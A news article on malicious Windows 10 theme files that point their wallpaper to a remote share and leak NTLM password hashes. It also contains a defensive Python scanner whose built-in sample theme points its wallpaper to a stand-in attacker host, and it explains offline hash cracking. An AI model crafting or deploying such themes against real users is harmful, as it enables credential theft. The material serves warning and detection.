Windows 10 users have been exposed to so many articles warning of security issues that there is a real danger of alert fatigue. Within the space of just a few short weeks, I have written about the potential for Microsoft Defender Antivirus to become a security risk itself, a Windows 10 exploit that Microsoft left unpatched for two years, and an authentication vulnerability fix that failed to do its job. But, like London buses that arrive in bunches, here is another warning that I suggest you take seriously: Windows 10 custom themes can be used to steal your Windows account password.
Malicious Windows 10 themes are a thing now
As picked up by the ever-vigilant Bleeping Computer, a security researcher has revealed how Windows 10 custom themes, and theme packs, can be used to steal Windows account passwords. The researcher, Jimmy Bayne, took to Twitter and explained how the wallpaper key in a Windows 10 theme file can be pointed at a remote, attacker-controlled resource as part of a pass-the-hash attack to harvest user credentials. All it takes is for the user to activate the weaponized theme file, which could be shared by way of an email attachment or, more likely, a link. When the theme is applied, Windows tries to fetch the wallpaper from that remote location and authenticates to it with the logged-in account's credentials, handing the attacker the account name and NTLM password hash without the user having to type anything.
This kind of attack relies on two things: a user who likes to switch around and experiment with Windows 10 themes, and a user who signs in with a Microsoft account rather than a local one, because the credentials Windows hands over belong to the account that applied the theme, and a Microsoft account password unlocks far more than one PC. Truth be told, if you are a fan of Windows customization, then the chances are pretty good that you are also into sharing themes you have created or using ones that others have. A theme is saved as a .theme file (an INI-style text file) and can be shared simply by the right-click "Save theme for sharing" option, which packs the theme and its images up as a new .deskthemepack file. These can then be shared online or by email.
Pass the hash
Pass-the-hash isn't as much fun as it might initially sound. It involves a Windows user being tricked into accessing a remote resource that requires authentication, such as a network share. Here the maliciously crafted theme points its wallpaper at such a resource, Windows tries to authenticate to it automatically, and the attacker's server captures the account name together with the NTLM hash (strictly, the NTLMv2 challenge-response, which can be cracked offline against a wordlist). From that the attacker can recover the login and password of the Microsoft account. Bleeping Computer confirmed that it was able to crack a simple password in around four seconds.
The researcher tweeted that he had reported the issue to the Microsoft Security Response Center earlier in the year, but was told it was a "feature by design" and would not be patched. I have reached out to Microsoft for comment and will update this article in due course once I have any official statement.
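To make the mechanism above concrete, here is an added example, not code from the original article or from the researcher: a small Python scanner that parses a .theme file and flags wallpaper paths that point off-host, the exact pattern that triggers the credential leak. The two sample themes are constructed for this example, the host name attacker.example is hypothetical, and the extra check on the Slideshow ImagesRootPath key is an addition of this example rather than something the report mentions. .themepack and .deskthemepack files are CAB archives wrapping a .theme file, so extract those first (expand.exe on Windows will do it) and point the scanner at the inner .theme.

```python
"""Flag Windows .theme files whose wallpaper is fetched from a remote host.

A .theme file is an INI-style text file. When the theme is applied, Windows
loads the image named by Wallpaper= in [Control Panel\\Desktop]; if that path
is a UNC path or a URL, Windows authenticates to the remote host to fetch it.
"""
import configparser
import re
import sys
from typing import Dict, List, Tuple

# (section, key) pairs naming images Windows fetches when a theme is applied.
# Wallpaper is the key from the report; ImagesRootPath (the slideshow folder)
# is an addition of this example, checked the same way.
IMAGE_KEYS: List[Tuple[str, str]] = [
    ("Control Panel\\Desktop", "Wallpaper"),
    ("Slideshow", "ImagesRootPath"),
]

# UNC paths (\\host\share\...), forward-slash UNC, and URLs all leave the host.
_REMOTE = re.compile(r"^(\\\\[^\\]|//|https?://|file://)", re.IGNORECASE)


def is_remote_path(value: str) -> bool:
    """True if the path would make Windows contact another host to fetch it."""
    return bool(_REMOTE.match(value.strip().strip('"').strip()))


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse .theme text. Interpolation is disabled because values such as
    %SystemRoot%\\Web\\... would otherwise be rejected by configparser."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key names as written
    cp.read_string(text)
    return cp


def find_remote_images(text: str) -> Dict[str, str]:
    """Return {'Section\\Key': path} for every image path that points off-host."""
    cp = parse_theme(text)
    findings: Dict[str, str] = {}
    for section, key in IMAGE_KEYS:
        if not cp.has_section(section):
            continue
        for name, value in cp.items(section):
            if name.lower() == key.lower() and is_remote_path(value):
                findings[f"{section}\\{name}"] = value.strip().strip('"')
    return findings


def scan_file(path: str) -> Dict[str, str]:
    """Read a .theme file from disk and scan it. Decoding as UTF-16 when a BOM
    is present and UTF-8 otherwise is an assumption of this example."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8-sig")
    return find_remote_images(text)


# Constructed sample: a theme whose wallpaper lives on a hypothetical
# attacker-controlled SMB share. Applying it makes Windows authenticate
# to attacker.example over SMB to fetch the image.
MALICIOUS_THEME = """\
[Theme]
DisplayName=Sunset Pack

[Control Panel\\Desktop]
Wallpaper=\\\\attacker.example\\share\\sunset.jpg
PicturePosition=4

[MasterThemeSelector]
MTSM=DABJDKT
"""

# Constructed sample: the same theme with a local wallpaper path.
BENIGN_THEME = """\
[Theme]
DisplayName=Local Pack

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\Web\\Wallpaper\\Windows\\img0.jpg
PicturePosition=4
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, scan_file(p) or "no remote image paths")
    else:
        print("malicious sample:", find_remote_images(MALICIOUS_THEME))
        print("benign sample:", find_remote_images(BENIGN_THEME))
```

Run it with no arguments to see the two constructed samples classified, or pass one or more extracted .theme files to scan them. A hit does not prove malice (a corporate theme may legitimately reference an internal share), but any theme from an untrusted source whose wallpaper points off-host should not be applied.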
Think twice before installing custom Windows 10 themes
“These gimmicky themes are clearly not created with security in mind, and at the risk of exposing passwords and other sensitive data, I would suggest users think twice when installing them,” Jake Moore, a cybersecurity specialist at ESET, says.
“With more users forced to move away from local Microsoft accounts,” Moore warns, “this comes with the added risk of remote attacks and the potential of attacking further services such as email. It is vital to use two-factor authentication for as many services that offer it.”
Re-associating the .theme, .themepack and .deskthemepack file extensions with another program, so that opening one no longer applies it, is the mitigation suggested by Jimmy Bayne, but be warned that this would prevent you from switching to any new theme. Administrators can also cut off the credential leak itself rather than the file type: the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", set to "Deny all", stops Windows sending NTLM credentials to remote hosts, and blocking outbound TCP port 445 at the firewall prevents the connection to an Internet-hosted share in the first place. Both can break legitimate access to internal shares, so test before rolling them out. My advice? Don't be tempted by the lure of a pretty desktop. Pick one you like and stick with it, avoid switching around, and don't click links that you aren't 101% sure are safe.